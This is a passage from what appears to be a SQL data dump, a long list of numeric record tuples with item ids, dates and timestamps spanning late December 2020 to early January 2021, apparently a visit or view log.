09:23:49'),(10413,2804,1,'2020-12-28','2020-12-28 10:09:45'),(10414,2309,1,'2020-12-28','2020-12-28 10:37:36'),(10415,91,1,'2020-12-28','2020-12-28 11:12:33'),(10416,1614,1,'2020-12-28','2020-12-28 11:26:09'),(10417,91,1,'2020-12-28','2020-12-28 11:26:36'),(10418,2159,1,'2020-12-28','2020-12-28 11:54:27'),(10419,91,1,'2020-12-28','2020-12-28 12:37:46'),(10420,1741,1,'2020-12-28','2020-12-28 13:23:20'),(10421,2309,1,'2020-12-28','2020-12-28 13:48:33'),(10422,1600,1,'2020-12-28','2020-12-28 14:33:51'),(10423,570,1,'2020-12-28','2020-12-28 15:34:16'),(10424,91,1,'2020-12-28','2020-12-28 15:49:31'),(10425,3045,1,'2020-12-28','2020-12-28 18:29:59'),(10426,2159,1,'2020-12-28','2020-12-28 20:08:26'),(10427,2159,1,'2020-12-28','2020-12-28 20:09:44'),(10428,2769,1,'2020-12-28','2020-12-28 20:20:33'),(10429,2769,1,'2020-12-28','2020-12-28 20:20:35'),(10430,1586,1,'2020-12-28','2020-12-28 20:29:56'),(10431,2159,1,'2020-12-28','2020-12-28 21:20:05'),(10432,1600,1,'2020-12-28','2020-12-28 22:32:22'),(10433,1600,1,'2020-12-28','2020-12-28 23:35:10'),(10434,80,1,'2020-12-29','2020-12-29 03:11:17'),(10435,469,1,'2020-12-29','2020-12-29 05:47:18'),(10436,1586,1,'2020-12-29','2020-12-29 07:59:59'),(10437,76,1,'2020-12-29','2020-12-29 08:00:56'),(10438,108,1,'2020-12-29','2020-12-29 08:01:08'),(10439,2159,1,'2020-12-29','2020-12-29 08:05:47'),(10440,2159,1,'2020-12-29','2020-12-29 08:06:05'),(10441,2159,1,'2020-12-29','2020-12-29 08:07:33'),(10442,2159,1,'2020-12-29','2020-12-29 08:09:14'),(10443,2159,1,'2020-12-29','2020-12-29 08:09:25'),(10444,2159,1,'2020-12-29','2020-12-29 08:10:03'),(10445,2159,1,'2020-12-29','2020-12-29 08:10:29'),(10446,2159,1,'2020-12-29','2020-12-29 08:11:05'),(10447,2159,1,'2020-12-29','2020-12-29 08:14:12'),(10448,1600,1,'2020-12-29','2020-12-29 08:26:57'),(10449,1745,1,'2020-12-29','2020-12-29 08:28:22'),(10450,1600,1,'2020-12-29','2020-12-29 08:29:55'),(10451,2159,1,'2020-12-29','2020-12-29 10:15:08'),(10452,2309,1,'2020-12-29','2020-12-29 11:05:40'),(10453,2309,1,'2020-12-29','2020-12-29 11:39:18'),(10454,3273,1,'2020-12-29','2020-12-29 12:37:04'),(10455,1600,1,'2020-12-29','2020-12-29 12:42:36'),(10456,2159,1,'2020-12-29','2020-12-29 13:42:02'),(10457,2159,1,'2020-12-29','2020-12-29 13:42:16'),(10458,2457,1,'2020-12-29','2020-12-29 14:40:43'),(10459,2457,1,'2020-12-29','2020-12-29 14:40:58'),(10460,1600,1,'2020-12-29','2020-12-29 14:45:42'),(10461,1600,1,'2020-12-29','2020-12-29 14:54:02'),(10462,68,1,'2020-12-29','2020-12-29 14:54:45'),(10463,76,1,'2020-12-29','2020-12-29 15:11:07'),(10464,1582,1,'2020-12-29','2020-12-29 15:13:58'),(10465,1600,1,'2020-12-29','2020-12-29 17:41:06'),(10466,1600,1,'2020-12-29','2020-12-29 22:09:33'),(10467,2804,1,'2020-12-29','2020-12-29 22:10:04'),(10468,3053,1,'2020-12-29','2020-12-29 22:28:31'),(10469,87,1,'2020-12-30','2020-12-30 01:38:05'),(10470,91,1,'2020-12-30','2020-12-30 01:39:15'),(10471,3263,1,'2020-12-30','2020-12-30 01:40:04'),(10472,91,1,'2020-12-30','2020-12-30 01:40:16'),(10473,1751,1,'2020-12-30','2020-12-30 01:40:36'),(10474,1602,1,'2020-12-30','2020-12-30 02:02:43'),(10475,91,1,'2020-12-30','2020-12-30 02:03:54'),(10476,1730,1,'2020-12-30','2020-12-30 02:04:57'),(10477,1602,1,'2020-12-30','2020-12-30 02:07:03'),(10478,1606,1,'2020-12-30','2020-12-30 08:01:48'),(10479,2309,1,'2020-12-30','2020-12-30 09:24:57'),(10480,2159,1,'2020-12-30','2020-12-30 09:34:48'),(10481,1747,1,'2020-12-30','2020-12-30 11:06:22'),(10482,2751,1,'2020-12-30','2020-12-30 11:16:25'),(10483,2751,1,'2020-12-30','2020-12-30 11:16:42'),(10484,3060,1,'2020-12-30','2020-12-30 11:35:01'),(10485,2309,1,'2020-12-30','2020-12-30 11:46:55'),(10486,2159,1,'2020-12-30','2020-12-30 11:53:04'),(10487,1602,1,'2020-12-30','2020-12-30 11:57:45'),(10488,2751,1,'2020-12-30','2020-12-30 12:03:49'),(10489,1606,1,'2020-12-30','2020-12-30 12:06:16'),(10490,3257,1,'2020-12-30','2020-12-30 12:26:28'),(10491,2159,1,'2020-12-30','2020-12-30 12:45:18'),(10492,2309,1,'2020-12-30','2020-12-30 12:47:12'),(10493,468,1,'2020-12-30','2020-12-30 14:04:09'),(10494,2159,1,'2020-12-30','2020-12-30 15:56:41'),(10495,2309,1,'2020-12-30','2020-12-30 16:48:42'),(10496,80,1,'2020-12-30','2020-12-30 17:24:42'),(10497,3005,1,'2020-12-30','2020-12-30 18:44:46'),(10498,1608,1,'2020-12-30','2020-12-30 18:56:58'),(10499,1608,1,'2020-12-30','2020-12-30 18:57:26'),(10500,1604,1,'2020-12-30','2020-12-30 19:23:00'),(10501,1604,1,'2020-12-30','2020-12-30 19:24:13'),(10502,2309,1,'2020-12-30','2020-12-30 23:02:20'),(10503,2309,1,'2020-12-30','2020-12-30 23:03:28'),(10504,91,1,'2020-12-31','2020-12-31 03:13:31'),(10505,91,1,'2020-12-31','2020-12-31 03:13:57'),(10506,2152,1,'2020-12-31','2020-12-31 03:16:19'),(10507,91,1,'2020-12-31','2020-12-31 03:23:28'),(10508,1745,1,'2020-12-31','2020-12-31 03:23:59'),(10509,91,1,'2020-12-31','2020-12-31 03:25:24'),(10510,1747,1,'2020-12-31','2020-12-31 03:26:00'),(10511,91,1,'2020-12-31','2020-12-31 03:26:49'),(10512,3102,1,'2020-12-31','2020-12-31 03:27:22'),(10513,91,1,'2020-12-31','2020-12-31 03:28:58'),(10514,1747,1,'2020-12-31','2020-12-31 03:29:17'),(10515,91,1,'2020-12-31','2020-12-31 03:29:22'),(10516,2159,1,'2020-12-31','2020-12-31 03:29:55'),(10517,91,1,'2020-12-31','2020-12-31 03:30:45'),(10518,1705,1,'2020-12-31','2020-12-31 03:31:17'),(10519,91,1,'2020-12-31','2020-12-31 03:32:05'),(10520,1749,1,'2020-12-31','2020-12-31 03:32:53'),(10521,91,1,'2020-12-31','2020-12-31 03:33:58'),(10522,3285,1,'2020-12-31','2020-12-31 03:34:46'),(10523,91,1,'2020-12-31','2020-12-31 03:35:55'),(10524,1768,1,'2020-12-31','2020-12-31 03:37:18'),(10525,91,1,'2020-12-31','2020-12-31 03:38:13'),(10526,2063,1,'2020-12-31','2020-12-31 03:38:58'),(10527,91,1,'2020-12-31','2020-12-31 03:40:12'),(10528,3278,1,'2020-12-31','2020-12-31 03:40:37'),(10529,91,1,'2020-12-31','2020-12-31 03:41:39'),(10530,1715,1,'2020-12-31','2020-12-31 03:43:22'),(10531,91,1,'2020-12-31','2020-12-31 03:43:51'),(10532,2309,1,'2020-12-31','2020-12-31 08:35:59'),(10533,2309,1,'2020-12-31','2020-12-31 09:02:48'),(10534,3282,1,'2020-12-31','2020-12-31 11:44:54'),(10535,1586,1,'2020-12-31','2020-12-31 13:40:45'),(10536,1600,1,'2020-12-31','2020-12-31 14:25:30'),(10537,1600,1,'2020-12-31','2020-12-31 14:25:37'),(10538,2309,1,'2020-12-31','2020-12-31 15:29:23'),(10539,84,1,'2020-12-31','2020-12-31 15:48:04'),(10540,1877,1,'2020-12-31','2020-12-31 15:48:13'),(10541,2252,1,'2020-12-31','2020-12-31 15:48:50'),(10542,1598,1,'2020-12-31','2020-12-31 16:16:21'),(10543,80,1,'2020-12-31','2020-12-31 16:19:18'),(10544,1598,1,'2020-12-31','2020-12-31 16:20:13'),(10545,1586,1,'2020-12-31','2020-12-31 20:01:34'),(10546,3282,1,'2020-12-31','2020-12-31 22:37:53'),(10547,481,1,'2020-12-31','2020-12-31 22:50:06'),(10548,1606,1,'2020-12-31','2020-12-31 22:50:11'),(10549,1751,1,'2021-01-01','2021-01-01 01:26:56'),(10550,481,1,'2021-01-01','2021-01-01 02:00:57'),(10551,2769,1,'2021-01-01','2021-01-01 03:09:21'),(10552,3117,1,'2021-01-01','2021-01-01 03:28:38'),(10553,3117,1,'2021-01-01','2021-01-01 05:28:39'),(10554,2159,1,'2021-01-01','2021-01-01 06:59:45'),(10555,2159,1,'2021-01-01','2021-01-01 07:00:00'),(10556,2309,1,'2021-01-01','2021-01-01 07:07:14'),(10557,2309,1,'2021-01-01','2021-01-01 07:08:06'),(10558,2309,1,'2021-01-01','2021-01-01 07:18:14'),(10559,1606,1,'2021-01-01','2021-01-01 10:03:04'),(10560,1606,1,'2021-01-01','2021-01-01 10:12:47'),(10561,1604,1,'2021-01-01','2021-01-01 15:30:17'),(10562,1604,1,'2021-01-01','2021-01-01 15:31:01'),(10563,1718,1,'2021-01-01','2021-01-01 20:54:57'),(10564,1544,1,'2021-01-01','2021-01-01 21:35:44'),(10565,2159,1,'2021-01-01','2021-01-01 22:31:48'),(10566,1586,1,'2021-01-01','2021-01-01 23:36:01'),(10567,2658,1,'2021-01-02','2021-01-02 02:47:07'),(10568,2309,1,'2021-01-02','2021-01-02 05:13:17'),(10569,1608,1,'2021-01-02','2021-01-02 07:04:53'),(10570,1600,1,'2021-01-02','2021-01-02 07:08:16'),(10571,1612,1,'2021-01-02','2021-01-02 08:46:31'),(10572,68,1,'2021-01-02','2021-01-02 10:13:04'),(10573,1586,1,'2021-01-02','2021-01-02 11:03:18'),(10574,91,1,'2021-01-02','2021-01-02 11:03:53'),(10575,1586,1,'2021-01-02','2021-01-02 11:23:56'),(10576,3287,1,'2021-01-02','2021-01-02 12:00:55'),(10577,2159,1,'2021-01-02','2021-01-02 13:19:05'),(10578,2309,1,'2021-01-02','2021-01-02 13:31:53'),(10579,1606,1,'2021-01-02','2021-01-02 13:40:59'),(10580,76,1,'2021-01-02','2021-01-02 13:41:35'),(10581,68,1,'2021-01-02','2021-01-02 13:41:55'),(10582,76,1,'2021-01-02','2021-01-02 13:42:33'),(10583,1606,1,'2021-01-02','2021-01-02 13:42:37'),(10584,1586,1,'2021-01-02','2021-01-02 14:20:43'),(10585,91,1,'2021-01-02','2021-01-02 14:21:44'),(10586,1707,1,'2021-01-02','2021-01-02 14:22:20'),(10587,2309,1,'2021-01-02','2021-01-02 15:21:03'),(10588,2457,1,'2021-01-02','2021-01-02 15:33:06'),(10589,1596,1,'2021-01-02','2021-01-02 16:29:13'),(10590,1586,1,'2021-01-02','2021-01-02 17:59:04'),(10591,467,1,'2021-01-02','2021-01-02 20:54:24'),(10592,2309,1,'2021-01-02','2021-01-02 22:59:58'),(10593,2309,1,'2021-01-02','2021-01-02 23:01:27'),(10594,2309,1,'2021-01-02','2021-01-02 23:15:22'),(10595,3287,1,'2021-01-02','2021-01-02 23:32:22'),(10596,3117,1,'2021-01-02','2021-01-02 23:50:20'),(10597,1586,1,'2021-01-03','2021-01-03 08:55:12'),(10598,1699,1,'2021-01-03','2021-01-03 08:57:21'),(10599,1594,1,'2021-01-03','2021-01-03 09:16:38'),(10600,2309,1,'2021-01-03','2021-01-03 09:53:58'),(10601,1600,1,'2021-01-03','2021-01-03 10:37:09'),(10602,1600,1,'2021-01-03','2021-01-03 10:40:07'),(10603,1582,1,'2021-01-03','2021-01-03 11:27:31'),(10604,3226,1,'2021-01-03','2021-01-03 12:24:22'),(10605,2395,1,'2021-01-03','2021-01-03 12:25:12'),(10606,1600,1,'2021-01-03','2021-01-03 14:06:26'),(10607,1608,1,'2021-01-03','2021-01-03 14:11:37'),(10608,335,1,'2021-01-03','2021-01-03 15:24:25'),(10609,2309,1,'2021-01-03','2021-01-03 15:31:51'),(10610,2309,1,'2021-01-03','2021-01-03 15:57:18'),(10611,1586,1,'2021-01-03','2021-01-03 16:30:44'),(10612,68,1,'2021-01-03','2021-01-03 16:31:07'),(10613,68,1,'2021-01-03','2021-01-03 16:31:43'),(10614,1586,1,'2021-01-03','2021-01-03 16:31:47'),(10615,2617,1,'2021-01-03','2021-01-03 16:32:18'),(10616,2159,1,'2021-01-03','2021-01-03 16:49:47'),(10617,2159,1,'2021-01-03','2021-01-03 16:50:06'),(10618,2159,1,'2021-01-03','2021-01-03 16:54:33'),(10619,3249,1,'2021-01-03','2021-01-03 17:55:05'),(10620,2152,1,'2021-01-03','2021-01-03 18:15:14'),(10621,485,1,'2021-01-03','2021-01-03 19:56:43'),(10622,2309,1,'2021-01-03','2021-01-03 20:00:21'),(10623,2309,1,'2021-01-03','2021-01-03 20:00:38'),(10624,1586,1,'2021-01-03','2021-01-03 20:29:40'),(10625,1586,1,'2021-01-03','2021-01-03 20:29:50'),(10626,1586,1,'2021-01-03','2021-01-03 20:30:14'),(10627,1612,1,'2021-01-03','2021-01-03 20:36:42'),(10628,2309,1,'2021-01-03','2021-01-03 20:48:34'),(10629,2309,1,'2021-01-03','2021-01-03 21:13:15'),(10630,3259,1,'2021-01-03','2021-01-03 21:46:05'),(10631,1608,1,'2021-01-03','2021-01-03 21:48:25'),(10632,1608,1,'2021-01-03','2021-01-03 21:48:29'),(10633,3034,1,'2021-01-03','2021-01-03 22:03:29'),(10634,2159,1,'2021-01-03','2021-01-03 23:38:29'),(10635,3092,1,'2021-01-03','2021-01-03 23:45:30'),(10636,2159,1,'2021-01-03','2021-01-03 23:48:29'),(10637,2309,1,'2021-01-03','2021-01-03 23:50:05'),(10638,2309,1,'2021-01-03','2021-01-03 23:50:12'),(10639,2309,1,'2021-01-03','2021-01-03 23:52:48'),(10640,3226,1,'2021-01-04','2021-01-04 00:06:25'),(10641,3229,1,'2021-01-04','2021-01-04 00:16:32'),(10642,2159,1,'2021-01-04','2021-01-04 03:10:50'),(10643,2159,1,'2021-01-04','2021-01-04 03:10:52'),(10644,2159,1,'2021-01-04','2021-01-04 03:13:01'),(10645,2309,1,'2021-01-04','2021-01-04 07:48:43'),(10646,2159,1,'2021-01-04','2021-01-04 08:09:14'),(10647,1598,1,'2021-01-04','2021-01-04 08:15:17'),(10648,1747,1,'2021-01-04','2021-01-04 08:16:19'),(10649,1877,1,'2021-01-04','2021-01-04 08:20:26'),(10650,2309,1,'2021-01-04','2021-01-04 09:02:47'),(10651,2309,1,'2021-01-04','2021-01-04 09:21:23'),(10652,2309,1,'2021-01-04','2021-01-04 09:22:49'),(10653,2309,1,'2021-01-04','2021-01-04 10:15:26'),(10654,1602,1,'2021-01-04','2021-01-04 11:04:41'),(10655,1602,1,'2021-01-04','2021-01-04 11:08:48'),(10656,1614,1,'2021-01-04','2021-01-04 11:20:03'),(10657,1614,1,'2021-01-04','2021-01-04 11:20:07'),(10658,2309,1,'2021-01-04','2021-01-04 11:28:44'),(10659,2159,1,'2021-01-04','2021-01-04 11:34:42'),(10660,3280,1,'2021-01-04','2021-01-04 11:40:17'),(10661,2309,1,'2021-01-04','2021-01-04 12:12:51'),(10662,2309,1,'2021-01-04','2021-01-04 13:04:38'),(10663,2309,1,'2021-01-04','2021-01-04 14:19:48'),(10664,2159,1,'2021-01-04','2021-01-04 14:24:28'),(10665,1604,1,'2021-01-04','2021-01-04 14:39:06'),(10666,2309,1,'2021-01-04','2021-01-04 14:54:01'),(10667,2159,1,'2021-01-04','2021-01-04 15:25:46'),(10668,3092,1,'2021-01-04','2021-01-04 15:30:37'),(10669,1598,1,'2021-01-04','2021-01-04 15:33:01'),(10670,1598,1,'2021-01-04','2021-01-04 15:34:15'),(10671,2309,1,'2021-01-04','2021-01-04 15:34:39'),(10672,2309,1,'2021-01-04','2021-01-04 15:40:20'),(10673,2309,1,'2021-01-04','2021-01-04 15:47:25'),(10674,2309,1,'2021-01-04','2021-01-04 15:54:54'),(10675,1598,1,'2021-01-04','2021-01-04 15:59:51'),(10676,2159,1,'2021-01-04','2021-01-04 17:02:28'),(10677,1586,1,'2021-01-05','2021-01-05 01:16:29'),(10678,1600,1,'2021-01-05','2021-01-05 04:52:28'),(10679,1600,1,'2021-01-05','2021-01-05 04:53:30'),(10680,1606,1,'2021-01-05','2021-01-05 06:21:30'),(10681,2159,1,'2021-01-05','2021-01-05 06:51:38'),(10682,2159,1,'2021-01-05','2021-01-05 06:51:44'),(10683,2309,1,'2021-01-05','2021-01-05 10:09:29'),(10684,1598,1,'2021-01-05','2021-01-05 10:34:00'),(10685,1598,1,'2021-01-05','2021-01-05 10:34:05'),(10686,1598,1,'2021-01-05','2021-01-05 10:35:18'),(10687,2161,1,'2021-01-05','2021-01-05 10:37:17'),(10688,2989,1,'2021-01-05','2021-01-05 10:39:51'),(10689,1598,1,'2021-01-05','2021-01-05 10:57:56'),(10690,1598,1,'2021-01-05','2021-01-05 11:02:35'),(10691,1598,1,'2021-01-05','2021-01-05 11:02:40'),(10692,1598,1,'2021-01-05','2021-01-05 11:03:13'),(10693,1598,1,'2021-01-05','2021-01-05 11:06:34'),(10694,1586,1,'2021-01-05','2021-01-05 11:50:56'),(10695,91,1,'2021-01-05','2021-01-05 11:52:47'),(10696,91,1,'2021-01-05','2021-01-05 11:53:26'),(10697,1586,1,'2021-01-05','2021-01-05 11:53:53'),(10698,2609,1,'2021-01-05','2021-01-05 12:59:53'),(10699,2309,1,'2021-01-05','2021-01-05 13:39:08'),(10700,1586,1,'2021-01-05','2021-01-05 14:29:25'),(10701,108,1,'2021-01-05','2021-01-05 14:35:27'),(10702,2503,1,'2021-01-05','2021-01-05 14:40:00'),(10703,91,1,'2021-01-05','2021-01-05 14:42:42'),(10704,2309,1,'2021-01-05','2021-01-05 15:32:23'),(10705,2309,1,'2021-01-05','2021-01-05 15:46:45'),(10706,2159,1,'2021-01-05','2021-01-05 16:40:29'),(10707,1582,1,'2021-01-05','2021-01-05 17:46:12'),(10708,91,1,'2021-01-05','2021-01-05 17:49:11'),(10709,91,1,'2021-01-05','2021-01-05 17:51:40'),(10710,68,1,'2021-01-05','2021-01-05 17:51:55'),(10711,91,1,'2021-01-05','2021-01-05 17:53:58'),(10712,1582,1,'2021-01-05','2021-01-05 18:06:38'),(10713,1870,1,'2021-01-05','2021-01-05 22:12:43'),(10714,2159,1,'2021-01-05','2021-01-05 22:45:29'),(10715,87,1,'2021-01-05','2021-01-05 22:46:10'),(10716,2159,1,'2021-01-05','2021-01-05 22:46:29'),(10717,1586,1,'2021-01-05','2021-01-05 23:01:32'),(10718,2617,1,'2021-01-05','2021-01-05 23:02:02'),(10719,2617,1,'2021-01-05','2021-01-05 23:03:22'),(10720,2617,1,'2021-01-05','2021-01-05 23:04:36'),(10721,1586,1,'2021-01-05','2021-01-05 23:04:39'),(10722,1600,1,'2021-01-05','2021-01-05 23:06:55'),(10723,1600,1,'2021-01-05','2021-01-05 23:06:56'),(10724,1596,1,'2021-01-06','2021-01-06 00:47:50'),(10725,1600,1,'2021-01-06','2021-01-06 01:03:07'),(10726,2769,1,'2021-01-06','2021-01-06 02:22:40'),(10727,3030,1,'2021-01-06','2021-01-06 02:23:14'),(10728,1598,1,'2021-01-06','2021-01-06 02:43:45'),(10729,2309,1,'2021-01-06','2021-01-06 03:05:20'),(10730,1594,1,'2021-01-06','2021-01-06 03:12:11'),(10731,1594,1,'2021-01-06','2021-01-06 03:13:21'),(10732,1600,1,'2021-01-06','2021-01-06 04:13:55'),(10733,1588,1,'2021-01-06','2021-01-06 04:53:27'),(10734,1582,1,'2021-01-06','2021-01-06 05:08:02'),(10735,1586,1,'2021-01-06','2021-01-06 05:27:04'),(10736,1612,1,'2021-01-06','2021-01-06 05:37:08'),(10737,1606,1,'2021-01-06','2021-01-06 05:41:52'),(10738,3124,1,'2021-01-06','2021-01-06 05:54:48'),(10739,570,1,'2021-01-06','2021-01-06 06:26:28'),(10740,2159,1,'2021-01-06','2021-01-06 06:35:22'),(10741,1604,1,'2021-01-06','2021-01-06 06:45:17'),(10742,1592,1,'2021-01-06','2021-01-06 07:15:50'),(10743,3280,1,'2021-01-06','2021-01-06 07:37:53'),(10744,3107,1,'2021-01-06','2021-01-06 07:37:57'),(10745,1600,1,'2021-01-06','2021-01-06 08:07:37'),(10746,2609,1,'2021-01-06','2021-01-06 08:17:44'),(10747,2457,1,'2021-01-06','2021-01-06 08:39:25'),(10748,3104,1,'2021-01-06','2021-01-06 08:43:07'),(10749,2801,1,'2021-01-06','2021-01-06 08:57:32'),(10750,91,1,'2021-01-06','2021-01-06 09:51:22'),(10751,2964,1,'2021-01-06','2021-01-06 09:53:38'),(10752,1614,1,'2021-01-06','2021-01-06 10:01:39'),(10753,2457,1,'2021-01-06','2021-01-06 10:13:56'),(10754,91,1,'2021-01-06','2021-01-06 10:25:46'),(10755,91,1,'2021-01-06','2021-01-06 10:32:20'),(10756,91,1,'2021-01-06','2021-01-06 10:33:26'),(10757,91,1,'2021-01-06','2021-01-06 10:33:36'),(10758,3261,1,'2021-01-06','2021-01-06 10:34:43'),(10759,3287,1,'2021-01-06','2021-01-06 10:36:05'),(10760,1594,1,'2021-01-06','2021-01-06 10:44:46'),(10761,1586,1,'2021-01-06','2021-01-06 10:54:45'),(10762,87,1,'2021-01-06','2021-01-06 10:57:28'),(10763,3247,1,'2021-01-06','2021-01-06 11:01:30'),(10764,2457,1,'2021-01-06','2021-01-06 11:04:55'),(10765,2751,1,'2021-01-06','2021-01-06 11:16:50'),(10766,91,1,'2021-01-06','2021-01-06 11:24:55'),(10767,1598,1,'2021-01-06','2021-01-06 11:45:57'),(10768,72,1,'2021-01-06','2021-01-06 11:55:20'),(10769,2309,1,'2021-01-06','2021-01-06 12:00:33'),(10770,2309,1,'2021-01-06','2021-01-06 12:02:00'),(10771,470,1,'2021-01-06','2021-01-06 12:13:29'),(10772,3181,1,'2021-01-06','2021-01-06 12:24:06'),(10773,3069,1,'2021-01-06','2021-01-06 12:50:17'),(10774,76,1,'2021-01-06','2021-01-06 13:26:56'),(10775,1606,1,'2021-01-06','2021-01-06 13:35:17'),(10776,3290,1,'2021-01-06','2021-01-06 13:37:49'),(10777,3297,1,'2021-01-06','2021-01-06 13:45:44'),(10778,1586,1,'2021-01-06','2021-01-06 14:22:57'),(10779,1588,1,'2021-01-06','2021-01-06 14:24:03'),(10780,3107,1,'2021-01-06','2021-01-06 14:36:22'),(10781,1600,1,'2021-01-06','2021-01-06 15:02:43'),(10782,1707,1,'2021-01-06','2021-01-06 15:17:53'),(10783,478,1,'2021-01-06','2021-01-06 15:17:56'),(10784,1600,1,'2021-01-06','2021-01-06 15:25:02'),(10785,1594,1,'2021-01-06','2021-01-06 16:07:06'),(10786,1600,1,'2021-01-06','2021-01-06 16:49:55'),(10787,2989,1,'2021-01-06','2021-01-06 16:56:38'),(10788,1606,1,'2021-01-06','2021-01-06 16:58:08'),(10789,87,1,'2021-01-06','2021-01-06 16:58:53'),(10790,2809,1,'2021-01-06','2021-01-06 17:04:41'),(10791,2159,1,'2021-01-06','2021-01-06 17:25:08'),(10792,2159,1,'2021-01-06','2021-01-06 17:34:43'),(10793,1600,1,'2021-01-06','2021-01-06 17:55:32'),(10794,3287,1,'2021-01-06','2021-01-06 17:57:07'),(10795,1737,1,'2021-01-06','2021-01-06 18:06:30'),(10796,2159,1,'2021-01-06','2021-01-06 18:17:09'),(10797,1586,1,'2021-01-06','2021-01-06 18:36:42'),(10798,80,1,'2021-01-06','2021-01-06 18:36:54'),(10799,80,1,'2021-01-06','2021-01-06 18:36:57'),(10800,80,1,'2021-01-06','2021-01-06 18:37:22'),(10801,1586,1,'2021-01-06','2021-01-06 18:37:25'),(10802,3027,1,'2021-01-06','2021-01-06 18:40:53'),(10803,2410,1,'2021-01-06','2021-01-06 18:46:42'),(10804,1588,1,'2021-01-06','2021-01-06 19:09:29'),(10805,1598,1,'2021-01-06','2021-01-06 19:18:59'),(10806,1598,1,'2021-01-06','2021-01-06 19:33:07'),(10807,2457,1,'2021-01-06','2021-01-06 19:33:53'),(10808,68,1,'2021-01-06','2021-01-06 19:34:02'),(10809,1598,1,'2021-01-06','2021-01-06 19:34:33'),(10810,1598,1,'2021-01-06','2021-01-06 19:34:39'),(10811,2457,1,'2021-01-06','2021-01-06 19:42:34'),(10812,3267,1,'2021-01-06','2021-01-06 19:51:19'),(10813,2775,1,'2021-01-06','2021-01-06 20:32:25'),(10814,1766,1,'2021-01-06','2021-01-06 20:42:49'),(10815,1614,1,'2021-01-06','2021-01-06 21:03:57'),(10816,1604,1,'2021-01-06','2021-01-06 21:19:21'),(10817,2801,1,'2021-01-06','2021-01-06 21:26:53'),(10818,3127,1,'2021-01-06','2021-01-06 21:37:46'),(10819,3034,1,'2021-01-06','2021-01-06 21:55:45'),(10820,3034,1,'2021-01-06','2021-01-06 22:04:30'),(10821,76,1,'2021-01-06','2021-01-06 22:13:22'),(10822,2609,1,'2021-01-06','2021-01-06 22:38:47'),(10823,1718,1,'2021-01-06','2021-01-06 22:46:30'),(10824,477,1,'2021-01-06','2021-01-06 22:57:03'),(10825,2309,1,'2021-01-06','2021-01-06 23:04:49'),(10826,2309,1,'2021-01-06','2021-01-06 23:06:44'),(10827,3124,1,'2021-01-06','2021-01-06 23:16:50'),(10828,2309,1,'2021-01-06','2021-01-06 23:18:17'),(10829,2309,1,'2021-01-06','2021-01-06 23:19:10'),(10830,2775,1,'2021-01-06','2021-01-06 23:37:07'),(10831,3290,1,'2021-01-06','2021-01-06 23:55:46'),(10832,68,1,'2021-01-07','2021-01-07 00:39:28'),(10833,1614,1,'2021-01-07','2021-01-07 01:00:42'),(10834,1586,1,'2021-01-07','2021-01-07 02:01:45'),(10835,3107,1,'2021-01-07','2021-01-07 03:18:03'),(10836,2813,1,'2021-01-07','2021-01-07 04:13:12'),(10837,3055,1,'2021-01-07','2021-01-07 04:17:27'),(10838,91,1,'2021-01-07','2021-01-07 04:27:30'),(10839,470,1,'2021-01-07','2021-01-07 04:37:32'),(10840,1709,1,'2021-01-07','2021-01-07 04:47:27'),(10841,2159,1,'2021-01-07','2021-01-07 05:27:10'),(10842,1600,1,'2021-01-07','2021-01-07 05:57:23'),(10843,1766,1,'2021-01-07','2021-01-07 06:27:31'),(10844,1602,1,'2021-01-07','2021-01-07 06:47:39'),(10845,1614,1,'2021-01-07','2021-01-07 06:57:30'),(10846,1588,1,'2021-01-07','2021-01-07 07:07:28'),(10847,1604,1,'2021-01-07','2021-01-07 07:27:38'),(10848,2178,1,'2021-01-07','2021-01-07 07:38:00'),(10849,2420,1,'2021-01-07','2021-01-07 07:47:54'),(10850,3107,1,'2021-01-07','2021-01-07 08:19:38'),(10851,3023,1,'2021-01-07','2021-01-07 08:35:50'),(10852,3285,1,'2021-01-07','2021-01-07 08:56:31'),(10853,2609,1,'2021-01-07','2021-01-07 09:09:59'),(10854,3045,1,'2021-01-07','2021-01-07 09:12:18'),(10855,2309,1,'2021-01-07','2021-01-07 09:28:07'),(10856,2457,1,'2021-01-07','2021-01-07 09:39:49'),(10857,2309,1,'2021-01-07','2021-01-07 09:56:26'),(10858,1730,1,'2021-01-07','2021-01-07 10:00:01'),(10859,1718,1,'2021-01-07','2021-01-07 10:43:18'),(10860,2309,1,'2021-01-07','2021-01-07 10:49:09'),(10861,2911,1,'2021-01-07','2021-01-07 10:55:37'),(10862,1544,1,'2021-01-07','2021-01-07 10:56:29'),(10863,108,1,'2021-01-07','2021-01-07 10:58:44'),(10864,76,1,'2021-01-07','2021-01-07 10:58:51'),(10865,87,1,'2021-01-07','2021-01-07 10:58:57'),(10866,1586,1,'2021-01-07','2021-01-07 11:23:08'),(10867,1594,1,'2021-01-07','2021-01-07 11:45:12'),(10868,2309,1,'2021-01-07','2021-01-07 11:53:18'),(10869,1614,1,'2021-01-07','2021-01-07 12:54:35'),(10870,1586,1,'2021-01-07','2021-01-07 13:07:45'),(10871,1586,1,'2021-01-07','2021-01-07 13:11:36'),(10872,1600,1,'2021-01-07','2021-01-07 13:32:43'),(10873,2993,1,'2021-01-07','2021-01-07 13:46:43'),(10874,2159,1,'2021-01-07','2021-01-07 13:59:40'),(10875,91,1,'2021-01-07','2021-01-07 14:02:08'),(10876,3107,1,'2021-01-07','2021-01-07 14:04:22'),(10877,2420,1,'2021-01-07','2021-01-07 14:54:02'),(10878,2159,1,'2021-01-07','2021-01-07 15:52:36'),(10879,1598,1,'2021-01-07','2021-01-07 16:07:18'),(10880,68,1,'2021-01-07','2021-01-07 16:22:11'),(10881,68,1,'2021-01-07','2021-01-07 16:22:25'),(10882,1586,1,'2021-01-07','2021-01-07 16:28:52'),(10883,1592,1,'2021-01-07','2021-01-07 16:49:00'),(10884,1544,1,'2021-01-07','2021-01-07 16:50:26'),(10885,108,1,'2021-01-07','2021-01-07 16:50:57'),(10886,91,1,'2021-01-07','2021-01-07 16:52:45'),(10887,76,1,'2021-01-07','2021-01-07 16:52:46'),(10888,76,1,'2021-01-07','2021-01-07 16:53:09'),(10889,108,1,'2021-01-07','2021-01-07 16:53:17'),(10890,1600,1,'2021-01-07','2021-01-07 17:15:47'),(10891,1778,1,'2021-01-07','2021-01-07 17:22:02'),(10892,76,1,'2021-01-07','2021-01-07 17:37:58'),(10893,87,1,'2021-01-07','2021-01-07 17:38:13'),(10894,68,1,'2021-01-07','2021-01-07 18:31:00'),(10895,68,1,'2021-01-07','2021-01-07 18:36:51'),(10896,1598,1,'2021-01-07','2021-01-07 19:59:50'),(10897,1600,1,'2021-01-07','2021-01-07 20:13:24'),(10898,1600,1,'2021-01-07','2021-01-07 